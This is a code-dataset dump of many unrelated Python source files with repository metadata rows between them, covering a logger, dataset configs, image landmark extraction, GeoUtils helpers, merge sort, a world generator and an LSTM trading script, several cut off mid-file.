"Apache-2.0"
] | null | null | null | import json
import random
from flask import Blueprint
from flask import request
from flask import session
from sqlalchemy import and_
from sqlalchemy import or_
from urlparse import urlparse
# from flask import current_app
from gitRoulette import auth
from gitRoulette import models
from gitRoulette.utils import request_utils
api = Blueprint('api', __name__)
db = models.db
| 32.15873 | 101 | 0.659057 |
b0ddf344239a48edf5e77538da1c1fa89461c624 | 1,556 | py | Python | translator/logger.py | dNationCloud/jsonnet-translator | 94d9d1b56d21a357fcab8adc555aa4630234d19c | [
"Apache-2.0"
] | 7 | 2021-04-14T11:30:03.000Z | 2021-05-17T11:26:50.000Z | translator/logger.py | dNationCloud/jsonnet-translator | 94d9d1b56d21a357fcab8adc555aa4630234d19c | [
"Apache-2.0"
] | 10 | 2021-01-14T07:18:55.000Z | 2021-10-01T12:56:39.000Z | translator/logger.py | dNationCloud/kubernetes-jsonnet-translator | 94d9d1b56d21a357fcab8adc555aa4630234d19c | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2020 The dNation Jsonnet Translator Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import logging.handlers
import sys
from pythonjsonlogger import jsonlogger
LOGGER_NAME = "translator"
LOG_FORMAT = "%(asctime)s - [%(levelname)-5s] - %(message)s"
FORMATTER = {
"default": logging.Formatter(LOG_FORMAT),
"json": jsonlogger.JsonFormatter(LOG_FORMAT),
}
def set_logger(level, format):
    """Configure the translator logger's threshold and output format.

    Args:
        level (str): Logger threshold.
        format (str): Logger format.
    Return:
        None
    """
    # Resolve the formatter first so an unknown format name fails fast.
    chosen_formatter = FORMATTER[format]
    translator_logger = logging.getLogger(LOGGER_NAME)
    translator_logger.setLevel(level)
    translator_logger.addHandler(get_console_handler(chosen_formatter))
    # Stop records from bubbling up to the root logger (avoids duplicates).
    translator_logger.propagate = False
| 27.785714 | 77 | 0.737147 |
b0de787d9d796dd2d84865af0e45d3952304b306 | 5,663 | py | Python | models/test2/scripts/lmdb_data.py | Mehuli-Ruh11/Flownet_v1 | 17d517416a24f396a21e36e35e73abeb857451d2 | [
"BSD-2-Clause"
] | 130 | 2016-10-28T18:37:14.000Z | 2022-03-29T03:24:31.000Z | models/test2/scripts/lmdb_data.py | Mehuli-Ruh11/Flownet_v1 | 17d517416a24f396a21e36e35e73abeb857451d2 | [
"BSD-2-Clause"
] | 34 | 2016-09-30T14:35:11.000Z | 2019-01-06T12:02:17.000Z | models/test2/scripts/lmdb_data.py | Mehuli-Ruh11/Flownet_v1 | 17d517416a24f396a21e36e35e73abeb857451d2 | [
"BSD-2-Clause"
] | 73 | 2016-06-24T10:51:51.000Z | 2020-12-22T11:21:40.000Z | import numpy as np
import caffe
import flowlib as fl
import os
import lmdb
from PIL import Image
VERBOSE = 0
SUBPIXELFACTOR = 4
MIN_FLOW = -4.18505
THRESHOLD = 1e8
PATCH_SIZE = 'FULL'
def read_lmdb(database_file):
    """Read the first record of an LMDB database of Caffe Datum protos.

    Args:
        database_file: Path to the LMDB database.

    Returns:
        tuple: (content, shape) where `content` is a writable 1-D uint8 numpy
        array of the raw datum bytes and `shape` is
        [datum.channels, datum.height, datum.width].
    """
    db = lmdb.open(database_file, readonly=True)
    try:
        with db.begin() as txn:
            raw_data = txn.get(b'00000000') # get the first key value
            datum = caffe.proto.caffe_pb2.Datum()
            datum.ParseFromString(raw_data)
            # convert string type data to actual data
            # content now is a Nx1 array
            # np.frombuffer replaces the deprecated/removed np.fromstring;
            # .copy() keeps the array writable like fromstring's result was.
            content = np.frombuffer(datum.data, dtype=np.uint8).copy()
            shape = [datum.channels, datum.height, datum.width]
    finally:
        # The transaction context does not close the environment itself.
        db.close()
    return content, shape
| 27.357488 | 80 | 0.707046 |
b0df7d5ad0499addaf0ae1570bc27728fffba61b | 778 | py | Python | configs/_base_/det_datasets/pool_icdar2013_icdar2015.py | andrgje/mmocr | 26963dcf56b6cc842d097617a9dc1688b01fcaed | [
"Apache-2.0"
] | null | null | null | configs/_base_/det_datasets/pool_icdar2013_icdar2015.py | andrgje/mmocr | 26963dcf56b6cc842d097617a9dc1688b01fcaed | [
"Apache-2.0"
] | null | null | null | configs/_base_/det_datasets/pool_icdar2013_icdar2015.py | andrgje/mmocr | 26963dcf56b6cc842d097617a9dc1688b01fcaed | [
"Apache-2.0"
] | null | null | null | dataset_type1 = 'IcdarDataset'
data_root1 = 'data/icdar15'
train1 = dict(
type=dataset_type1,
ann_file=f'{data_root1}/instances_training.json',
img_prefix=f'{data_root1}/imgs',
pipeline=None)
test1 = dict(
type=dataset_type1,
ann_file=f'{data_root1}/instances_validation.json',
img_prefix=f'{data_root1}/imgs',
pipeline=None)
dataset_type2 = 'IcdarDataset'
data_root2 = 'data/icdar13'
train2 = dict(
type=dataset_type2,
ann_file=f'{data_root2}/instances_training.json',
img_prefix=f'{data_root2}/imgs',
pipeline=None)
test2 = dict(
type=dataset_type2,
ann_file=f'{data_root2}/instances_validation.json',
img_prefix=f'{data_root2}/imgs',
pipeline=None)
train_list = [train1,train2]
test_list = [test1,test2]
| 22.882353 | 55 | 0.713368 |
b0e1dfb1774454a45bec65b7f4f0e603d7f1da9e | 13,580 | py | Python | lib/Protocol/EmNetconfProtocol.py | multi-service-fabric/element-manager | e550d1b5ec9419f1fb3eb6e058ce46b57c92ee2f | [
"Apache-2.0"
] | null | null | null | lib/Protocol/EmNetconfProtocol.py | multi-service-fabric/element-manager | e550d1b5ec9419f1fb3eb6e058ce46b57c92ee2f | [
"Apache-2.0"
] | null | null | null | lib/Protocol/EmNetconfProtocol.py | multi-service-fabric/element-manager | e550d1b5ec9419f1fb3eb6e058ce46b57c92ee2f | [
"Apache-2.0"
] | 1 | 2020-04-02T01:17:43.000Z | 2020-04-02T01:17:43.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright(c) 2019 Nippon Telegraph and Telephone Corporation
# Filename: EmNetconfProtocol.py
'''
Protocol processing section (Netconf)
'''
import traceback
import time
import json
from ncclient import manager
from ncclient import operations
import GlobalModule
import EmNetconfClient
from EmCommonLog import decorater_log
from EmCommonLog import decorater_log_in_out
| 37.513812 | 80 | 0.546318 |
b0e21640f79315d5678d2b1eb1562ded16d33050 | 1,935 | py | Python | policy/openbot/callbacks.py | januxnet/OpenBot | 04768161a552281e1e14acde98589a64628b86c7 | [
"MIT"
] | 1,971 | 2020-08-24T22:24:24.000Z | 2021-07-24T18:43:39.000Z | policy/openbot/callbacks.py | FlorentGuinier/OpenBot | 087b1c89fd61ee5e644a0b042c9e5f25540caeae | [
"MIT"
] | 145 | 2020-08-26T23:00:28.000Z | 2021-07-26T22:00:06.000Z | policy/openbot/callbacks.py | FlorentGuinier/OpenBot | 087b1c89fd61ee5e644a0b042c9e5f25540caeae | [
"MIT"
] | 342 | 2020-08-26T10:39:43.000Z | 2021-07-26T12:12:10.000Z | # Created by Matthias Mueller - Intel Intelligent Systems Lab - 2020
import os
import tensorflow as tf
# This function defines a custom learning schedule.
| 26.148649 | 88 | 0.67907 |
b0e2cf5bd2ba70f93247b07879264830fda0661a | 856 | py | Python | generate_landmarks.py | PandaWhoCodes/chutya_rating | 88f73e37c517c1d68ebf518b40cf93667f39991b | [
"MIT"
] | null | null | null | generate_landmarks.py | PandaWhoCodes/chutya_rating | 88f73e37c517c1d68ebf518b40cf93667f39991b | [
"MIT"
] | null | null | null | generate_landmarks.py | PandaWhoCodes/chutya_rating | 88f73e37c517c1d68ebf518b40cf93667f39991b | [
"MIT"
] | null | null | null | import sys
import os
import dlib
import glob
from skimage import io
# Pre-trained dlib 68-point facial landmark model and the image directory to scan.
predictor_path = "data/shape_predictor_68_face_landmarks.dat"
faces_folder_path = "data/pics"
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(predictor_path)
# NOTE(review): sortKeyFunc is not defined in this file as shown -- confirm it
# is provided elsewhere (presumably a numeric sort key on the filename).
my_glob = glob.glob(os.path.join(faces_folder_path, "*.jpg"))
my_glob.sort(key=sortKeyFunc)
print(my_glob)
for f in my_glob:
    print("Processing file: {}".format(f))
    img = io.imread(f)
    # Second argument upsamples the image once to help detect smaller faces.
    dets = detector(img, 1)
    for k, d in enumerate(dets):
        shape = predictor(img, d)
        file_write = ""
        # Serialize all 68 landmark (x, y) pairs as comma-separated text.
        for i in range(0, 68):
            file_write += str(shape.part(i).x) + ", " + str(shape.part(i).y) + ", "
        # NOTE(review): `f` here shadows the filename loop variable above
        # (harmless since the loop rebinds `f`, but worth renaming).
        with open("data/landmarks.txt", "a") as f:
            f.write(file_write)
            f.write("\n")
| 25.939394 | 83 | 0.647196 |
b0e46a90af345235275bf125d7191b762e1c076e | 6,530 | py | Python | geoutils/misc.py | erikmannerfelt/GeoUtils | 96a044f7cca73f936e5b245a5e99e0d2102d279f | [
"BSD-3-Clause"
] | 23 | 2020-11-11T11:00:45.000Z | 2022-03-28T07:06:56.000Z | geoutils/misc.py | erikmannerfelt/GeoUtils | 96a044f7cca73f936e5b245a5e99e0d2102d279f | [
"BSD-3-Clause"
] | 223 | 2020-11-11T14:34:51.000Z | 2022-03-31T14:14:58.000Z | geoutils/misc.py | erikmannerfelt/GeoUtils | 96a044f7cca73f936e5b245a5e99e0d2102d279f | [
"BSD-3-Clause"
] | 14 | 2021-02-19T09:57:46.000Z | 2022-03-21T09:49:12.000Z | """Miscellaneous functions, mainly for testing."""
from __future__ import annotations
import functools
import warnings
import numpy as np
import rasterio as rio
import geoutils
from geoutils._typing import ArrayLike
from geoutils.georaster import Raster, RasterType
def array_equal(
    array1: RasterType | ArrayLike,
    array2: RasterType | ArrayLike,
    equal_nan: bool = True,
    tolerance: float = 0.0,
) -> bool:
    """
    Check if two arrays or Rasters are equal.
    This function mirrors (and partly uses) 'np.array_equal' with these exceptions:
    1. Different dtypes are okay as long as they are equal (e.g. '1 == 1.0' is True)
    2. Rasters are directly comparable.
    3. masked_array masks are respected.
    4. A tolerance argument is added.
    5. The function works with numpy<=1.18.
    :param array1: The first array-like object to compare.
    :param array2: The second array-like object to compare.
    :param equal_nan: Whether to compare NaNs as equal ('NaN == NaN' is True)
    :param tolerance: The maximum allowed summed difference between the arrays.
    Examples:
        Any object that can be parsed as an array can be compared.
        >>> arr1 = [1, 2, 3]
        >>> arr2 = np.array([1., 2., 3.])
        >>> array_equal(arr1, arr2)
        True
        Nans are equal by default, but can be disabled with 'equal_nan=False'
        >>> arr3 = np.array([1., 2., np.nan])
        >>> array_equal(arr1, arr3)
        False
        >>> array_equal(arr3, arr3.copy())
        True
        >>> array_equal(arr3, arr3, equal_nan=False)
        False
        The equality tolerance can be set with the 'tolerance' argument (defaults to 0).
        >>> arr4 = np.array([1., 2., 3.1])
        >>> array_equal(arr1, arr4)
        False
        >>> array_equal(arr1, arr4, tolerance=0.2)
        True
        Masks in masked_arrays are respected.
        >>> arr5 = np.ma.masked_array(arr1, [False, False, True])
        >>> array_equal(arr1, arr5)
        False
        >>> array_equal(arr3, arr5)
        True
        >>> array_equal(arr3, arr5, equal_nan=False)
        False
    """
    arrays: list[np.ndarray] = []
    strings_compared = False  # Flag to handle string arrays instead of numeric
    # Convert both inputs to numpy ndarrays
    for arr in array1, array2:
        # Detect string data from the first element's dtype name.
        # NOTE(review): this indexes element [0], so an empty input raises
        # IndexError before any comparison happens -- confirm intended.
        if any(s in np.dtype(type(np.asanyarray(arr)[0])).name for s in ("<U", "str")):
            strings_compared = True
        if isinstance(arr, Raster):  # If a Raster subclass, take its data. I don't know why mypy complains here!
            arr = arr.data  # type: ignore
        if isinstance(arr, np.ma.masked_array):  # If a masked_array, replace the masked values with nans
            # Cast to float first so masked cells can be filled with NaN.
            if "float" not in np.dtype(arr.dtype).name:
                arr = arr.astype(float)
            arrays.append(arr.filled(np.nan))  # type: ignore
        else:
            arrays.append(np.asarray(arr))
    # Shapes must match before any element-wise comparison.
    if np.shape(arrays[0]) != np.shape(arrays[1]):
        return False
    if strings_compared:  # If they are strings, the tolerance/nan handling is irrelevant.
        return bool(np.array_equal(arrays[0], arrays[1]))
    # Element-wise difference of the two stacked arrays (shape-checked above).
    diff = np.diff(arrays, axis=0)
    if "float" in np.dtype(diff.dtype).name and np.any(~np.isfinite(diff)):
        # Check that the nan-mask is equal. If it's not, or nans are not allowed at all, return False
        if not equal_nan or not np.array_equal(np.isfinite(arrays[0]), np.isfinite(arrays[1])):
            return False
    # nansum ignores the matching-NaN positions validated above.
    return bool(np.nansum(np.abs(diff)) <= tolerance)
def deprecate(removal_version: str | None = None, details: str | None = None): # type: ignore
"""
Trigger a DeprecationWarning for the decorated function.
:param func: The function to be deprecated.
:param removal_version: Optional. The version at which this will be removed.
If this version is reached, a ValueError is raised.
:param details: Optional. A description for why the function was deprecated.
:triggers DeprecationWarning: For any call to the function.
:raises ValueError: If 'removal_version' was given and the current version is equal or higher.
:returns: The decorator to decorate the function.
"""
return deprecator_func
def resampling_method_from_str(method_str: str) -> rio.warp.Resampling:
"""Get a rasterio resampling method from a string representation, e.g. "cubic_spline"."""
# Try to match the string version of the resampling method with a rio Resampling enum name
for method in rio.warp.Resampling:
if str(method).replace("Resampling.", "") == method_str:
resampling_method = method
break
# If no match was found, raise an error.
else:
raise ValueError(
f"'{method_str}' is not a valid rasterio.warp.Resampling method. "
f"Valid methods: {[str(method).replace('Resampling.', '') for method in rio.warp.Resampling]}"
)
return resampling_method
| 38.187135 | 113 | 0.622971 |
b0e7cd1cacbdf9713f6574f513c54cc6fc8be57b | 1,860 | py | Python | sorting/merge_sort.py | matuzalemmuller/algoritmos | 138e7c9747879a58fab48908541c175b8653da5c | [
"MIT"
] | null | null | null | sorting/merge_sort.py | matuzalemmuller/algoritmos | 138e7c9747879a58fab48908541c175b8653da5c | [
"MIT"
] | null | null | null | sorting/merge_sort.py | matuzalemmuller/algoritmos | 138e7c9747879a58fab48908541c175b8653da5c | [
"MIT"
] | null | null | null | # UFSC - Campus Trindade
# PPGEAS - Introducao a Algoritmos
# Matuzalem Muller dos Santos
# 2019/1
# Commented code is for calculating algorithm complexity and printing variables
from random import randint
import time
import sys
if __name__ == '__main__':
    # Element count comes from the first CLI argument; fall back to 10 when
    # the argument is missing or not an integer.  The original bare `except:`
    # also swallowed SystemExit/KeyboardInterrupt, so it is narrowed here.
    try:
        number_of_elements = int(sys.argv[1])
    except (IndexError, ValueError):
        number_of_elements = 10

    # Random payload for the sort benchmark (randint bounds are inclusive).
    array = [randint(1, 9_999_999_999) for _ in range(number_of_elements)]

    # Time only the sort itself; `merge_sort` is defined elsewhere in this file.
    start_time = time.time()
    array = merge_sort(array)
    running_time = time.time() - start_time
    print(running_time)
b0e7ec352bf4d97e4861749ed21422b37bbf8b42 | 2,239 | py | Python | binsync/data/struct.py | zachsez/binsync | 39a53a84c640314adbf50e612177c4a56c43542c | [
"MIT"
] | 40 | 2021-05-09T03:24:46.000Z | 2022-03-31T23:01:50.000Z | binsync/data/struct.py | zachsez/binsync | 39a53a84c640314adbf50e612177c4a56c43542c | [
"MIT"
] | 53 | 2021-05-27T07:53:58.000Z | 2022-03-27T21:35:26.000Z | binsync/data/struct.py | zachsez/binsync | 39a53a84c640314adbf50e612177c4a56c43542c | [
"MIT"
] | 10 | 2021-05-13T22:09:38.000Z | 2022-03-31T23:51:27.000Z | import toml
from typing import List, Dict
from .artifact import Artifact
| 23.568421 | 102 | 0.590442 |
b0e84025ba8edc34831e545492abd9cc1b7a33c6 | 9,070 | py | Python | __init__.py | itsmepvr/list_images_to_excel | a4da3948a289c91cbcab90980364e989af7f1118 | [
"MIT"
] | null | null | null | __init__.py | itsmepvr/list_images_to_excel | a4da3948a289c91cbcab90980364e989af7f1118 | [
"MIT"
] | null | null | null | __init__.py | itsmepvr/list_images_to_excel | a4da3948a289c91cbcab90980364e989af7f1118 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Author: Venkata Ramana P
<github.com/itsmepvr>
List files to an excel sheet
"""
import os, glob
import sys
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog, QMessageBox
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from os.path import expanduser
import xlsxwriter
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| 43.190476 | 110 | 0.661632 |
b0e8a0baacae15b6d64e13be86210039b28af7e3 | 1,215 | py | Python | exception.py | a2gs/pythonStudy | e790e223a05fd50a5bcaf1240ef24ff60f361cdd | [
"MIT"
] | null | null | null | exception.py | a2gs/pythonStudy | e790e223a05fd50a5bcaf1240ef24ff60f361cdd | [
"MIT"
] | null | null | null | exception.py | a2gs/pythonStudy | e790e223a05fd50a5bcaf1240ef24ff60f361cdd | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
def func(b):
    """Demo raiser: myExcept_1 for b == 1, myExcept_2 for b == 2, None otherwise."""
    if b == 1:
        raise myExcept_1
    if b == 2:
        raise myExcept_2
    # b == 3 (and any other value) falls through and returns None implicitly.
# Exercise both exception paths; the first two cases share identical
# handling, so drive them from a loop (output is unchanged, including the
# numbered 'DoneN' separators).
for attempt in (1, 2):
    try:
        func(attempt)
    except myExcept_1 as e:
        print(f'Erro number: {e.err} message: {e.msg}')
    except myExcept_2 as e:
        print(f'Erro number: {e.err} message: {e.msg}')
    else:
        print('No exception')
    finally:
        print('Do this')
    print(f'Done{attempt}\n----------------------------------------')

# Third case: func(3) returns normally, so the else/finally branches run
# and no 'Done' separator is printed (matching the original script).
try:
    func(3)
except myExcept_1 as e:
    print(f'Erro number: {e.err} message: {e.msg}')
except myExcept_2 as e:
    print(f'Erro number: {e.err} message: {e.msg}')
else:
    print('No exception')
finally:
    print('Do this')
| 19.918033 | 56 | 0.626337 |
b0e8e97e17556ae476f654f72b30433601cb2273 | 564 | py | Python | datachecker/processors/conditionals.py | jayclassless/datachecker | dd42b95f87eaaca428595fe5da639f9a710afba8 | [
"MIT"
] | null | null | null | datachecker/processors/conditionals.py | jayclassless/datachecker | dd42b95f87eaaca428595fe5da639f9a710afba8 | [
"MIT"
] | null | null | null | datachecker/processors/conditionals.py | jayclassless/datachecker | dd42b95f87eaaca428595fe5da639f9a710afba8 | [
"MIT"
] | null | null | null | from ..errors import DataRequiredError, ShortCircuitSignal
from ..util import processor
__all__ = (
'required',
'optional',
)
| 18.8 | 58 | 0.64539 |
b0eca7b772b3e9b8c51b6d9de56d789e01ceaffc | 226 | py | Python | python/args/multiple.py | jdurbin/sandbox | ee982f7386ae02c5937dbaee867710b5cd2cc71b | [
"MIT"
] | null | null | null | python/args/multiple.py | jdurbin/sandbox | ee982f7386ae02c5937dbaee867710b5cd2cc71b | [
"MIT"
] | null | null | null | python/args/multiple.py | jdurbin/sandbox | ee982f7386ae02c5937dbaee867710b5cd2cc71b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import sys,argparse
parser = argparse.ArgumentParser()
parser.add_argument('-foo', nargs='+', help='foo values', required=False)
args = parser.parse_args()
for foo in args.foo:
print("Foo: ",foo) | 20.545455 | 73 | 0.70354 |
b0ed0165784914f7dc8282f6f368dd72c90b41f2 | 1,594 | py | Python | src/parent_class/ParentPluralList.py | jameskabbes/parent_class | cecf938a2f9c66d8914967098b2064526bbec1c7 | [
"MIT"
] | null | null | null | src/parent_class/ParentPluralList.py | jameskabbes/parent_class | cecf938a2f9c66d8914967098b2064526bbec1c7 | [
"MIT"
] | null | null | null | src/parent_class/ParentPluralList.py | jameskabbes/parent_class | cecf938a2f9c66d8914967098b2064526bbec1c7 | [
"MIT"
] | null | null | null | from parent_class import ParentPlural
from typing import List
if __name__ == '__main__':
    # Smoke test: build an empty ParentPluralList and dump its attributes.
    plural_list = ParentPluralList()
    plural_list.print_atts()
b0ed1693b1a77aee2f28b941c3d753890e7d9408 | 1,454 | py | Python | prototypes/harvesters/cxidb_harvester.py | materials-data-facility/connect | 9ec5b61750bf6fa579bf3ec122f31880d3c049b8 | [
"Apache-2.0"
] | 1 | 2019-09-13T18:35:56.000Z | 2019-09-13T18:35:56.000Z | prototypes/harvesters/cxidb_harvester.py | materials-data-facility/connect_server | 9ec5b61750bf6fa579bf3ec122f31880d3c049b8 | [
"Apache-2.0"
] | 15 | 2018-11-01T18:08:11.000Z | 2021-12-06T17:55:03.000Z | prototypes/harvesters/cxidb_harvester.py | materials-data-facility/connect | 9ec5b61750bf6fa579bf3ec122f31880d3c049b8 | [
"Apache-2.0"
] | 1 | 2020-11-30T17:02:41.000Z | 2020-11-30T17:02:41.000Z | import requests
from json import dump
import os
from shutil import rmtree
from tqdm import tqdm
#Collects available data from CXIDB and saves to the given directory
#out_dir: The path to the directory (which will be created) for the data files
#existing_dir:
# -1: Remove out_dir if it exists
# 0: Error if out_dir exists (Default)
# 1: Overwrite files in out_dir if there are path collisions
#verbose: Print status messages? Default False
| 36.35 | 82 | 0.643741 |
b0ed5b6a6f6876d6d3b9b9b973debc09d4041302 | 136 | py | Python | bot/permissions.py | Yakov-Varnaev/Epicker_bot | da077e0bcfbd41a2efaed74d71e7c4c818b842c0 | [
"MIT"
] | null | null | null | bot/permissions.py | Yakov-Varnaev/Epicker_bot | da077e0bcfbd41a2efaed74d71e7c4c818b842c0 | [
"MIT"
] | null | null | null | bot/permissions.py | Yakov-Varnaev/Epicker_bot | da077e0bcfbd41a2efaed74d71e7c4c818b842c0 | [
"MIT"
] | null | null | null | from aiogram import types
import config
| 17 | 48 | 0.786765 |
b0f062298bedb55fde1aeecf88bc32677fffabc9 | 127 | py | Python | ssshare/__init__.py | centaur679/ShadowSocksShare | 41f85e9a0adc1322fd8f254a1c1a5360d228507a | [
"Apache-2.0"
] | 2,341 | 2019-03-04T05:41:12.000Z | 2022-03-31T11:30:40.000Z | ssshare/__init__.py | centaur679/ShadowSocksShare | 41f85e9a0adc1322fd8f254a1c1a5360d228507a | [
"Apache-2.0"
] | 50 | 2019-03-24T01:35:13.000Z | 2021-09-09T22:59:15.000Z | ssshare/__init__.py | centaur679/ShadowSocksShare | 41f85e9a0adc1322fd8f254a1c1a5360d228507a | [
"Apache-2.0"
] | 780 | 2019-03-04T07:33:37.000Z | 2022-03-22T23:32:53.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import Flask
app = Flask(__name__)
app.config.from_object("config")
| 15.875 | 32 | 0.685039 |
b0f238f39a9f9a11e1383c07dd66cb298f4de952 | 21,160 | py | Python | worldengine/cli/main.py | stefan-feltmann/lands | b2f1fc3aab4895763160a135d085a17dceb5f58e | [
"MIT"
] | null | null | null | worldengine/cli/main.py | stefan-feltmann/lands | b2f1fc3aab4895763160a135d085a17dceb5f58e | [
"MIT"
] | null | null | null | worldengine/cli/main.py | stefan-feltmann/lands | b2f1fc3aab4895763160a135d085a17dceb5f58e | [
"MIT"
] | null | null | null | import sys
from argparse import ArgumentParser
import os
import pickle
import random
import worldengine.generation as geo
from worldengine.common import array_to_matrix, set_verbose, print_verbose
from worldengine.draw import draw_ancientmap_on_file, draw_biome_on_file, draw_ocean_on_file, \
draw_precipitation_on_file, draw_grayscale_heightmap_on_file, draw_simple_elevation_on_file, \
draw_temperature_levels_on_file, draw_riversmap_on_file
from worldengine.plates import world_gen, generate_plates_simulation
from worldengine.step import Step
from worldengine.world import World
from worldengine.version import __version__
VERSION = __version__
OPERATIONS = 'world|plates|ancient_map|info'
SEA_COLORS = 'blue|brown'
STEPS = 'plates|precipitations|full'
def generate_plates(seed, world_name, output_dir, width, height,
                    num_plates=10):
    """
    Run the plates simulation only and render the resulting elevation maps.

    Eventually this method should be invoked when generation is called at
    asked to stop at step "plates"; it should not be a different operation.

    :param seed: RNG seed forwarded to the plates simulation
    :param world_name: base name used for the world and the output files
    :param output_dir: directory where the PNG images are written
    :param width: world width in cells
    :param height: world height in cells
    :param num_plates: number of tectonic plates to simulate
    :return: None (writes two PNG files and prints their paths)
    """
    elevation, plates = generate_plates_simulation(seed, width, height,
                                                   num_plates=num_plates)

    world = World(world_name, width, height, seed, num_plates, -1.0, "plates")
    world.set_elevation(array_to_matrix(elevation, width, height), None)
    world.set_plates(array_to_matrix(plates, width, height))

    # TODO calculate appropriate sea_level
    sea_level = 1.0

    def render(path_template, label):
        # Draw the current elevation map and report where it was written.
        filename = path_template % (output_dir, world_name)
        draw_simple_elevation_on_file(world.elevation['data'], filename, width,
                                      height, sea_level)
        print("+ %s image generated in '%s'" % (label, filename))

    render('%s/plates_%s.png', 'plates')
    geo.center_land(world)
    render('%s/centered_plates_%s.png', 'centered plates')
# -------------------------------
if __name__ == "__main__":
main()
| 41.653543 | 98 | 0.57689 |
b0f3965138dd98bc050b860206e62e5235246cb0 | 1,432 | py | Python | poc-api-gateway/init-project.py | ronald-pineda/poc | b5bdb7eff963b251ea70cf02570c7d0b6cbef5e3 | [
"Apache-2.0"
] | null | null | null | poc-api-gateway/init-project.py | ronald-pineda/poc | b5bdb7eff963b251ea70cf02570c7d0b6cbef5e3 | [
"Apache-2.0"
] | null | null | null | poc-api-gateway/init-project.py | ronald-pineda/poc | b5bdb7eff963b251ea70cf02570c7d0b6cbef5e3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
import sys
import os
servicesFolder = sys.argv[1]
projectFolders = sys.argv[2].split(',')
# projectFolders = "project1 project2".split(' ')
# servicesFolderName = "/services"
srcFolders = "src src/main src/main/java src/main/resources src/test src/test/java src/test/resources".split(
' ')
currentPath = os.getcwd()
fullServicesFolder = currentPath + "/" + servicesFolder
create_project_folders(projectFolders)
| 30.468085 | 109 | 0.672486 |
b0f74b9d843423b3b2ee4eb76a8944598071e925 | 10,133 | py | Python | lstm.py | mustyoshi/scikit-ta | c2a8f4ce2deadaa13d8bd8891aabd096b397e330 | [
"MIT"
] | 1 | 2018-03-12T19:50:14.000Z | 2018-03-12T19:50:14.000Z | lstm.py | mustyoshi/scikit-ta | c2a8f4ce2deadaa13d8bd8891aabd096b397e330 | [
"MIT"
] | null | null | null | lstm.py | mustyoshi/scikit-ta | c2a8f4ce2deadaa13d8bd8891aabd096b397e330 | [
"MIT"
] | 1 | 2020-02-22T21:59:39.000Z | 2020-02-22T21:59:39.000Z | from __future__ import print_function
import tensorflow as tf
from tensorflow.contrib import rnn
import pandas as pd
import numpy as np
import random
import time
import os
import datetime
from tensorflow.python.client import timeline
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
from sklearn.model_selection import train_test_split
from sklearn.metrics import f1_score
from sklearn.pipeline import Pipeline
import mods
#from . import ProductionPipe
if __name__ == "__main__":
# Training Parameters
device="/gpu:0"
learning_rate = .0001
batch_size = (20*5)
display_step = 10
timesteps = 1 # timesteps
num_classes = 2 # MNIST total classes (0-9 digits)
to_drop = ['Date','Time','Open','High','Low','Close','Volume',"Period_4_Lookforward_p1","Period_4_Lookforward_p2"]
to_bool = []
create = True
if(create):
#df = pd.read_csv('dhy.us.txt',names=["Date","Time","Open","High","Low","Close","Volume","Ope"])
df = pd.read_csv('bac.us.txt')
origs = df[['Close']].copy()
#df = pd.read_csv('combined.csv',header=None,names=["Open","High","Low","Close","Volume"])
prod_pipe = mods.CreatePipeline() #Pipeline([('ft1',ft1),('ft2',ft2),('ft3',ft3)])
df['Period_4_Lookforward_p1'] = (df['Close'].shift(-4).astype(float) > df['Close'].astype(float))
df['Period_4_Lookforward_p2'] =(np.min([df['Low'].shift(-n) for n in range(1,4)],axis=0) > (df['Close'].astype(float)*.99)) #np.amax([df['Close'].shift(-n).astype(float) for n in range(1,4)],axis=0) > df['Close']
df['Period_4_Lookforward'] = (df['Period_4_Lookforward_p1'].astype(bool) == True) & (df['Period_4_Lookforward_p2'].astype(bool) == True)
df = prod_pipe.transform(df)
#to_bool.append('Period_4_Lookforward')
#for b in to_bool:
# df[b] = df[b].astype(bool)
df = df.dropna()
df.drop(df.index[:32], inplace=True,errors="ignore")
#df.to_csv('Hours.csv',index=False)
#df = df.drop(to_drop,axis=1)
df = df.astype(float)
df.to_csv('Hours.csv',index=False,float_format="%.8g")
else:
df = pd.read_csv('Hours.csv')
print(sum(df['Period_4_Lookforward'].values),'total ups',sum(df['Period_4_Lookforward'].values)/len(df))
num_input = len(df.columns)-1
num_hidden =num_input*20 # int((num_input*num_input)//2) # hidden layer num of features
train = df[:int(len(df)*0.9)]
test = df[len(train):]
dfs = splitDataFrameIntoSmaller(train)
training_steps = len(dfs)*100
del dfs[-1]
random.shuffle(dfs)
dfs.append(test)
print(num_input,'inputs')
print(num_hidden,'nodes per layer')
print(len(dfs),'batches')
print(len(test),'test parts')
ind = 0
# Network Parameters
with tf.device(device):
# tf Graph input
X = tf.placeholder("float", [None, timesteps, num_input])
Y = tf.placeholder("float", [None, num_classes])
# Define weights
weights = {
'out': tf.Variable(tf.random_normal([num_hidden, num_classes]))
}
biases = {
'out': tf.Variable(tf.random_normal([num_classes]))
}
logits = RNN(X, weights, biases)
with tf.device("/cpu:0"):
prediction = tf.nn.softmax(logits)
# Define loss and optimizer
loss_op = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(
logits=logits, labels=Y))
#optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
#optimizer = tf.train.AdagradOptimizer(learning_rate=learning_rate)
